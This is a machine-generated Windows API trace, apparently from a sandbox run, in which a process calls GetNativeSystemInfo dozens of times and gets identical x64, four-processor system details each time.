	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.266] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.267] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.268] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.269] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
